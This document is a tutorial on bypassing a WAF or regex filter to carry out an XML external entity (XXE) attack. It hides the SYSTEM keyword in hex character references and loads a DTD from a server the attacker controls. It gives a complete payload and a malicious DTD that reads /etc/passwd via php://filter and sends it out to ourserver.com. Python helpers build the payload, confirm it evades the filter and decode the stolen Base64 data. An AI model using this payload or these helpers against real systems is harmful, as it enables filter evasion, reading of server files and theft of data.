A useful way to get past a WAF that forbids keywords such as SYSTEM is to encode them as HTML entities (numeric character references), so that the blacklisted word never appears literally in the request.
The same applies to regex-based filters. In this case we will bypass the following regex:
/<!(?:DOCTYPE|ENTITY)(?:\s|%|&#[0-9]+;|&#x[0-9a-fA-F]+;)+[^\s]+\s+(?:SYSTEM|PUBLIC)\s+[\'\"]/im
This regex stops us from declaring an external entity with the following structure:
<!ENTITY file SYSTEM "file:///path/to/file">
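To see why a direct declaration is rejected, the filter can be tried locally. This is a minimal sketch that assumes the regex behaves the same way in Python's `re` module as in the original engine; the helper name `is_blocked` is made up for illustration.

```python
import re

# The filter quoted above, with its "i" and "m" flags mapped to Python's re flags.
FILTER = re.compile(
    r"<!(?:DOCTYPE|ENTITY)(?:\s|%|&#[0-9]+;|&#x[0-9a-fA-F]+;)+[^\s]+\s+(?:SYSTEM|PUBLIC)\s+[\'\"]",
    re.IGNORECASE | re.MULTILINE,
)


def is_blocked(body: str) -> bool:
    """Return True when the filter would match (and so reject) the body."""
    return FILTER.search(body) is not None


# A general external entity and a parameter entity, both declared in the clear.
plain = '<!ENTITY file SYSTEM "file:///path/to/file">'
parameter = '<!ENTITY % dtd SYSTEM "http://ourserver.com/bypass.dtd" >'

print(is_blocked(plain), is_blocked(parameter))  # True True
```

Both forms are caught because the literal SYSTEM keyword follows the entity name.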
To avoid this, we use HTML entities to encode the following declaration, so that we can load a DTD from a server we control:
<!ENTITY % dtd SYSTEM "http://ourserver.com/bypass.dtd" >
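The HTML entity equivalent is:
&#x3C;&#x21;&#x45;&#x4E;&#x54;&#x49;&#x54;&#x59;&#x20;&#x25;&#x20;&#x64;&#x74;&#x64;&#x20;&#x53;&#x59;&#x53;&#x54;&#x45;&#x4D;&#x20;&#x22;&#x68;&#x74;&#x74;&#x70;&#x3A;&#x2F;&#x2F;&#x6F;&#x75;&#x72;&#x73;&#x65;&#x72;&#x76;&#x65;&#x72;&#x2E;&#x63;&#x6F;&#x6D;&#x2F;&#x62;&#x79;&#x70;&#x61;&#x73;&#x73;&#x2E;&#x64;&#x74;&#x64;&#x22;&#x20;&#x3E;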
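The encoding does not need to be done by hand. The following sketch converts every character of a declaration into a hexadecimal numeric character reference; the function name `to_hex_char_refs` is an assumption for illustration, not part of any tool.

```python
import html


def to_hex_char_refs(text: str) -> str:
    """Encode every character as a hexadecimal numeric character reference."""
    return "".join(f"&#x{ord(ch):X};" for ch in text)


declaration = '<!ENTITY % dtd SYSTEM "http://ourserver.com/bypass.dtd" >'
encoded = to_hex_char_refs(declaration)
print(encoded)

# Round-trip check: decoding the references gives back the declaration.
assert html.unescape(encoded) == declaration
```

Encoding the whole declaration, rather than only the SYSTEM keyword, keeps the helper simple and leaves nothing for a keyword filter to match.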
The idea is to use this encoded declaration to hide the SYSTEM keyword and load the DTD we control. This way we only have to bypass the WAF or regex once, and we can define any entity we need in our DTD.
Our server has to serve a DTD like the following:
<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/path/to/file">
<!ENTITY % abt "<!ENTITY exfil SYSTEM 'http://ourserver.com/bypass.xml?%data;'>">
%abt;
We can modify this DTD as needed, since it is served from our server and will not be blocked by the WAF or regex on the victim.
The following payload loads our external DTD while bypassing the blacklisted SYSTEM keyword:
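<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY % a "&#x3C;&#x21;&#x45;&#x4E;&#x54;&#x49;&#x54;&#x59;&#x20;&#x25;&#x20;&#x64;&#x74;&#x64;&#x20;&#x53;&#x59;&#x53;&#x54;&#x45;&#x4D;&#x20;&#x22;&#x68;&#x74;&#x74;&#x70;&#x3A;&#x2F;&#x2F;&#x6F;&#x75;&#x72;&#x73;&#x65;&#x72;&#x76;&#x65;&#x72;&#x2E;&#x63;&#x6F;&#x6D;&#x2F;&#x62;&#x79;&#x70;&#x61;&#x73;&#x73;&#x2E;&#x64;&#x74;&#x64;&#x22;&#x20;&#x3E;" >%a;%dtd;]><data><env>&exfil;</env></data>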
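The payload can be assembled and checked against the filter before it is sent. This sketch assumes the regex quoted earlier behaves the same in Python's `re` module; `build_payload` and `to_hex_char_refs` are hypothetical helper names.

```python
import re

# The filter quoted earlier, with its "i" and "m" flags mapped to Python's re flags.
FILTER = re.compile(
    r"<!(?:DOCTYPE|ENTITY)(?:\s|%|&#[0-9]+;|&#x[0-9a-fA-F]+;)+[^\s]+\s+(?:SYSTEM|PUBLIC)\s+[\'\"]",
    re.IGNORECASE | re.MULTILINE,
)


def to_hex_char_refs(text: str) -> str:
    """Encode every character as a hexadecimal numeric character reference."""
    return "".join(f"&#x{ord(ch):X};" for ch in text)


def build_payload(dtd_url: str) -> str:
    """Wrap the encoded parameter-entity declaration in the document shown above."""
    declaration = f'<!ENTITY % dtd SYSTEM "{dtd_url}" >'
    return (
        '<?xml version="1.0" encoding="UTF-8"?>'
        f'<!DOCTYPE foo [<!ENTITY % a "{to_hex_char_refs(declaration)}" >%a;%dtd;]>'
        "<data><env>&exfil;</env></data>"
    )


payload = build_payload("http://ourserver.com/bypass.dtd")
print(FILTER.search(payload) is None)  # True: the filter finds nothing to match
```

The filter finds no match because the only literal `<!ENTITY` in the payload is followed by a quoted string rather than by SYSTEM or PUBLIC.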
All that remains is to send the payload and wait for the exfiltration request on our server. The data we receive is the Base64 encoding of the target file, here /etc/passwd.
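Once the request shows up in the server log, the query string can be decoded back into the file contents. This is a minimal sketch. It assumes the Base64 data arrives as the raw query string of the request to bypass.xml, the helper name `decode_exfil` is made up, and the sample request is generated locally rather than captured from a real target.

```python
import base64
from urllib.parse import urlsplit


def decode_exfil(request_target: str) -> str:
    """Decode the Base64 data carried in the query string of a logged request."""
    query = urlsplit(request_target).query
    # Restore any '=' padding that may have been lost along the way.
    query += "=" * (-len(query) % 4)
    return base64.b64decode(query).decode("utf-8", errors="replace")


# Hypothetical sample: one passwd-style line, encoded here only for the demo.
sample_line = b"root:x:0:0:root:/root:/bin/bash\n"
sample_request = "/bypass.xml?" + base64.b64encode(sample_line).decode("ascii")

print(decode_exfil(sample_request))
```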